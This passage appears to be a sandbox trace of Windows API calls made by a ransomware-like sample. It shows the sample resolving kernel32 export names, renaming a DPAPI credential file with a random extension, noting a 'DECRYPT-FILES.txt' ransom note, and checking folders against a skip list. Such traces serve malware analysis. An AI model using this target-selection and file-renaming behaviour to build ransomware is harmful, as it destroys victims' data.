(lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0180.719] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0180.719] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0180.719] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0180.719] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0180.719] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0180.719] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0180.719] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0180.719] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0180.720] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0180.720] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0180.720] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0180.720] lstrlenA (lpString="CREATEJOBSET") returned 12 [0180.720] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0180.720] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0180.720] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0180.720] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0180.720] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0180.720] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0180.720] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0180.720] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0180.720] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0180.720] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0180.720] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0180.720] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0180.720] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0180.720] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0180.720] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0180.720] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0180.720] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0180.720] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0180.720] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0180.720] lstrlenA (lpString="CREATEPIPE") returned 10 [0180.720] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0180.720] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0180.720] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0180.720] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0180.720] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0180.720] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0180.720] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0180.720] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0180.720] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0180.720] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0180.720] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0180.720] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0180.720] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0180.721] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0180.721] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0180.721] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0180.721] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0180.721] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0180.721] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0180.721] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0180.721] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0180.721] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0180.721] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0180.721] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0180.721] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0180.721] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0180.721] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0180.721] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0180.721] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0180.721] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0180.721] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0180.721] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0180.721] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0180.721] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0180.721] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0180.721] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0180.721] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0180.721] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0180.721] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0180.721] lstrlenA (lpString="CREATETHREAD") returned 12 [0180.721] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0180.721] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0180.721] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0180.721] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0180.721] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0180.721] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0180.721] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0180.721] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0180.721] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0180.721] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0180.722] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0180.722] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0180.722] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0180.722] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0180.722] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0180.722] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0180.722] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0180.722] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0180.722] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0180.722] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0180.722] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0180.722] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0180.722] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0180.722] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0180.722] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0180.722] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0180.722] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0180.722] lstrlenA (lpString="CTRLROUTINE") returned 11 [0180.722] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0180.722] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0180.722] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0180.722] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0180.722] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0180.722] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0180.722] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0180.722] lstrlenA (lpString="DEBUGBREAK") returned 10 [0180.722] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0180.722] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0180.722] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0180.722] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0180.722] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0180.722] lstrlenA (lpString="DECODEPOINTER") returned 13 [0180.722] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0180.722] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0180.722] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0180.722] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0180.722] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0180.722] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0180.723] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0180.723] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0180.723] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0180.723] lstrlenA (lpString="DELETEATOM") returned 10 [0180.723] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0180.723] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0180.723] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0180.723] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0180.723] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0180.723] lstrlenA (lpString="DELETEFIBER") returned 11 [0180.723] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0180.723] lstrlenA (lpString="DELETEFILEA") returned 11 [0180.723] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0180.723] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0180.723] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0180.723] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0180.723] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0180.723] lstrlenA (lpString="DELETEFILEW") returned 11 [0180.723] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0180.723] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0180.723] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0180.723] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0180.723] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0180.723] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0180.723] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0180.723] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0180.723] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0180.723] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0180.723] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0180.723] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0180.723] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0180.723] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0180.723] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0180.723] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0180.723] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0180.723] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0180.723] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0180.723] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0180.724] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0180.724] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0180.724] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0180.724] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0180.724] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0180.724] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0180.724] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0180.724] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0180.724] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0180.724] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0180.724] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0180.724] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0180.724] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0180.724] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0180.724] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0180.724] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0180.724] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0180.724] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0180.724] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0180.724] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0180.724] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0180.724] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0180.724] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0180.724] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0180.724] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0180.724] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0180.724] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0180.724] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0180.724] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0180.724] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0180.724] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0180.724] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0180.724] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0180.724] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0180.724] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0180.724] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0180.724] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0180.725] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0180.725] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0180.725] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0180.725] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0180.725] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0180.725] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0180.725] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0180.725] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0180.725] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0180.725] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0180.725] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0180.725] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.FV3Rc5O") returned 80 [0180.725] wsprintfW (in: param_1=0x36fdd64, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.FV3Rc5O.J8icI5") returned 87 [0180.725] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.FV3Rc5O" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist.fv3rc5o"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.FV3Rc5O.J8icI5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist.fv3rc5o.j8ici5"), dwFlags=0x0) returned 1 [0180.726] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.726] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.726] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.726] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaacf9740, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaacf9740, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacf9740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.726] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.726] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaadb7e20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaadb7e20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3111613574-2524581245-2586426736-500", cAlternateFileName="S-1-5-~1")) returned 1 [0180.726] lstrcmpW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2=".") returned 1 [0180.726] lstrcmpW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="..") returned 1 [0180.727] lstrcatW (in: lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="\\" | out: lpString1="S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="S-1-5-21-3111613574-2524581245-2586426736-500\\" [0180.727] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="S-1-5-21-3111613574-2524581245-2586426736-500\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" [0180.727] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\Program Files") returned 0x0 [0180.727] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch=":\\Windows") returned 0x0 [0180.727] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\Games\\") returned 0x0 [0180.727] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.727] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.727] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.727] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS 